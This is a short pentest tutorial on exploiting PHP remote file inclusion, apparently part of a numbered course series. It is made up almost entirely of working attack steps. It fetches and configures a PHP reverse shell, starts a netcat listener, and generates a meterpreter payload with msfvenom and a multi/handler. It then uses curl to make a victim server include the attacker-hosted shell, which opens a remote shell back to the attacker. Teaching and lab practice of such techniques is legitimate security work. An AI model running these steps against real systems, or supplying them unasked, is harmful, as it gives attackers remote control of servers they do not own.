10.5 : Web app exploitation - Remote file inclusion (Part V)

Remote file inclusion

  • basically is mounting a online file to the victim.

Cracking a PHP Linux server RFI

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php > shell.php

Edit it with your favourite text editor, we need to change the connection string.

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
....
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.101';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...

Mount it online, dont parse to php-fpm.

Lets back to your kali linux, and start listening on port 4444

root@kali:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
...

Now you can try to load the file in your victim , something like this:

curl http://192.168.56.104/page=http://192.168.56.101/shell.php

Cracking a PHP Windows server RFI

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 > shell.php

Mount it online, dont parse to php-fpm.

Lets back to your kali linux, enter msfconsole and use exploit/multi/handler .

msfconsole
use exploit/multi/handler
set LHOST=192.168.56.101
set LPORT=4444
set payload php/meterpreter/reverse_tcp
exploit

Now you can try to load the file in your victim , something like this:

curl http://192.168.56.104/page=http://192.168.56.101/shell.php

Back to your kali msfconsole, there should be a shell connected.